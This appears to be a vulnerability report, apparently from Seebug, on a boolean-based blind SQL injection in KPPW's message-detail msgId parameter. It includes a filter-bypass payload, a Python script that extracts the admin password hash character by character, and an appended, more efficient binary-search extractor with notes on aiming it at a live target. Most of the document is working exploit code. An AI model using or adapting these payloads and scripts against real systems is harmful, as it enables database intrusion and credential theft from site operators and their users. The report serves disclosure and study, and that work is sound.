### Brief description:

KPPW2620150327UTF-8.zip, the latest version as of March 27.

### Details:

Url1 (normal request):

http://localhost/KPPW/index.php?do=user&view=message&op=detail&msgId=74&type=trends&intPage=1

![Figure 1](https://images.seebug.org/upload/201503/2723220621c436854a2914d1f1bdfdfb79bed2b3.png)

Url2 (`msgId=74&&1=1`; the `&&` is URL-encoded as `%26%26` so the ampersands are not parsed as parameter separators; the page renders exactly like Url1):

http://localhost/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%261%3D1

![Figure 2](https://images.seebug.org/upload/201503/2723222698ece75cf6b1e20b8558e5b3daaefa8d.png)

Url3 (`msgId=74&&1=2`; the page differs):

http://localhost/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%261%3D2

![Figure 3](https://images.seebug.org/upload/201503/272322489410ffb629cb810421479dddd42b51fe.png)

### Proof of vulnerability:

The true condition (`1=1`) returns the normal message page while the false condition (`1=2`) does not, so `msgId` reaches the query unescaped and can be used for boolean-based blind injection. There is some filtering, but it can be bypassed: the payload below uses `/**/` comments in place of spaces and `&&` in place of `AND`, both of which MySQL accepts, and compares one character of the password hash of the user with `uid=1` in `keke_witkey_member` against a chosen character value (`CHAR(48)` is `'0'`, position 1 here):

&&(select/**/CHAR(48))=SUBSTR((SELECT/**/password/**/from/**/keke_witkey_member/**/WHERE/**/uid=1),1,1)

Verification script (the condition is true when the normal page comes back, detected here by the `msgId=73` link to the neighbouring message; set your own session cookie and marker string):

```
# coding: utf-8
# Boolean-based blind extraction of keke_witkey_member.password for uid=1 (Python 3).
# Each request asks "is character i2 of the hash equal to CHAR(i1)?"; when that is true
# the normal message page is rendered, which we detect by a marker string in the body.
import http.client

HOST, PORT = "localhost", 80
COOKIE = "PHPSESSID=*"   # the page needs a logged-in session: set your own session id here
MARKER = "msgId=73"      # something only the "true" page contains; set your own

def get(i1, i2):
    conn = http.client.HTTPConnection(HOST, PORT)
    url = ("/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1"
           "&msgId=74%26%26(select%2f**%2fCHAR(" + i1 + "))%3dSUBSTR((SELECT%2f**%2fpassword"
           "%2f**%2ffrom%2f**%2fkeke_witkey_member%2f**%2fWHERE%2f**%2fuid%3d1)%2c" + i2 + ",1%29")
    # no Accept-Encoding header: a gzip-compressed body would never contain the plain-text marker
    conn.request("GET", url, headers={
        "User-Agent": "Firefox/22.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Cookie": COOKIE,
        "Connection": "close",
    })
    body = conn.getresponse().read().decode("utf-8", "ignore")
    conn.close()
    return body.count(MARKER)

mm = []
for i in range(1, 33):            # 32-character hash
    for ii in range(48, 123):     # candidate characters '0'..'z'
        if get(str(ii), str(i)) != 0:
            mm.append(chr(ii))
            print("".join(mm))
            break
```

Result:

![Figure 4](https://images.seebug.org/upload/201503/272325156ad62e1f592a32c84a7611cfd24d0cb3.png)
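The script above tries every candidate character with `=`, which costs up to 75 requests per character. The following is an added example, not code from the original report or from KPPW: it builds the same `&&` / `/**/` payload for the `msgId` parameter, but binary-searches a sorted hex alphabet with a `<` comparison (assuming the filter lets `<` through as it does `=`) and then confirms each digit with one `=` request, so a character outside the assumed alphabet is reported instead of silently mis-read. To make it runnable offline, the vulnerable handler is replaced by an in-memory SQLite stand-in with a hypothetical `witkey_message` table and a constructed sample hash; the member table and column names mirror the report. Because SQLite has no `&&` operator, only the stand-in rewrites `&&` to `AND`; MySQL accepts the payload as sent.

```python
# Added example, not part of the original report: a reusable boolean-blind
# extractor for the msgId injection point, exercised offline against an
# in-memory SQLite stand-in so it runs without a KPPW install.
import sqlite3
import urllib.parse

# Constructed sample hash (md5 of "password"); stands in for keke_witkey_member.password.
FAKE_PASSWORD_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"
HEX = "0123456789abcdef"   # sorted candidate alphabet for a lowercase hex digest


def build_msgid(position, char_code, op):
    """URL-encoded msgId value: 74 && (select CHAR(n)) <op> SUBSTR(password, position, 1).

    Spaces are replaced by /**/ and AND by && exactly as in the report's payload;
    only '&' is percent-encoded so the query string is not split into new parameters.
    """
    cond = ("&&(select/**/CHAR(%d))%sSUBSTR((SELECT/**/password/**/from/**/"
            "keke_witkey_member/**/WHERE/**/uid=1),%d,1)" % (char_code, op, position))
    return "74" + urllib.parse.quote(cond, safe="()*/=,<>")


class FakeKppw:
    """Stand-in for the vulnerable message-detail handler (the message table name and
    columns are hypothetical; the member table mirrors the report). It concatenates the
    raw msgId into SQL and reports whether a message row came back, which is the same
    true/false signal the real page gives through its content."""

    def __init__(self, password_hash):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE keke_witkey_member(uid INTEGER, password TEXT)")
        self.db.execute("INSERT INTO keke_witkey_member VALUES (1, ?)", (password_hash,))
        self.db.execute("CREATE TABLE witkey_message(msg_id INTEGER, body TEXT)")
        self.db.execute("INSERT INTO witkey_message VALUES (74, 'constructed message')")

    def detail(self, msgid_param):
        sql_fragment = urllib.parse.unquote(msgid_param)
        # MySQL reads && as AND; SQLite has no && operator, so only the simulation rewrites it.
        sql = "SELECT body FROM witkey_message WHERE msg_id=" + sql_fragment.replace("&&", " AND ")
        return self.db.execute(sql).fetchone() is not None


def extract(oracle, length=32, alphabet=HEX):
    """Recover `length` characters using a boolean oracle(msgid_value) -> bool.

    A '<' comparison lets us binary-search the sorted alphabet (4 requests per hex
    digit) instead of trying every candidate with '=' (up to 75 per character);
    one final '=' request confirms the digit and catches characters outside the alphabet.
    """
    out = []
    for pos in range(1, length + 1):
        lo, hi = 0, len(alphabet) - 1
        while lo < hi:
            mid = (lo + hi) // 2
            # CHAR(candidate) < actual  =>  the real character lies above alphabet[mid]
            if oracle(build_msgid(pos, ord(alphabet[mid]), "<")):
                lo = mid + 1
            else:
                hi = mid
        if not oracle(build_msgid(pos, ord(alphabet[lo]), "=")):
            raise ValueError("position %d: character is not in the assumed alphabet" % pos)
        out.append(alphabet[lo])
    return "".join(out)


if __name__ == "__main__":
    print(extract(FakeKppw(FAKE_PASSWORD_HASH).detail))
```

Against a live target, `oracle` is a function that sends the request with the session cookie and returns whether the marker string appeared, exactly as `get()` in the report does; the hex alphabet assumption holds for an MD5-style digest and the final `=` check will raise if it does not.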